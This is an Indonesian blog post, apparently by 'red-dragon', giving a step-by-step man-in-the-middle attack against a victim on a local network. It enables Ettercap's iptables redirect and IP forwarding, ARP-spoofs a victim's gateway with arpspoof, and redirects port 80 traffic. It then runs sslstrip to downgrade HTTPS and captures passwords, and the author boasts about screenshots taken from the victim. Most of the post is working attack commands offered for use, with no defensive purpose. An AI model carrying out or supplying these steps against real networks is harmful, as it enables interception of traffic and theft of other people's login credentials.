Pertama, cek konfigurasi Ettercap dengan memasukan command ini di terminal:
Code:
root@metasploit:~# gedit /etc/etter.conf
Kemudian cek baris ke 167:
File:
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Hapus karakter pagar di depan line ke 168: "#redir command on ....", sehingga menjadi:
File:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Save, lalu kita akan menuju tahap kedua. Masukan perintah ini dengan menggunakan terminal:
Code:
root@metasploit:~# echo 1 > /proc/sys/net/ipv4/ip_forward
Kemudian:
Code:
root@metasploit:~# arpspoof -i wlan0 -t [ipaddress korban] [default gateway korban]
Jika berhasil, maka terminal akan tampak seperti ini:
Kemudian kita akan melakukan proses routing, dimana korban akan dialihkan ke suatu ip address atai port yang telah ditentukan oleh penyerang. Masukan kode berikut. [Catatan: Jangan hentikan proses arpspoof, buat tab baru, atau buka terminal baru untuk melakukan proses routing]
Code:
root@metasploit:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Pada tahap ini korban tidak akan bisa menuju web manapun yang menggunakan koneksi SSL atau HTTPS karena sudah dirouting ke port 10000. Disaat krusial ini, kita membutuhkan bantuan SSLstrip untuk mengijinkan korban mengakses HTTPS dengan syarat kebobolan password. Masukan kode berikut:
Code:
root@metasploit:~# sslstrip -a -k -f
Kemudian kita sniffing kembali koneksi yang terjadi pada ip address korban dengan bantuan ettercap. Anda tidak akan percaya dengan apa yang sudah saya lakukan. Berikut screenshoot korban yang saya dapatkan.
red-dragon
0 comment:
Post a Comment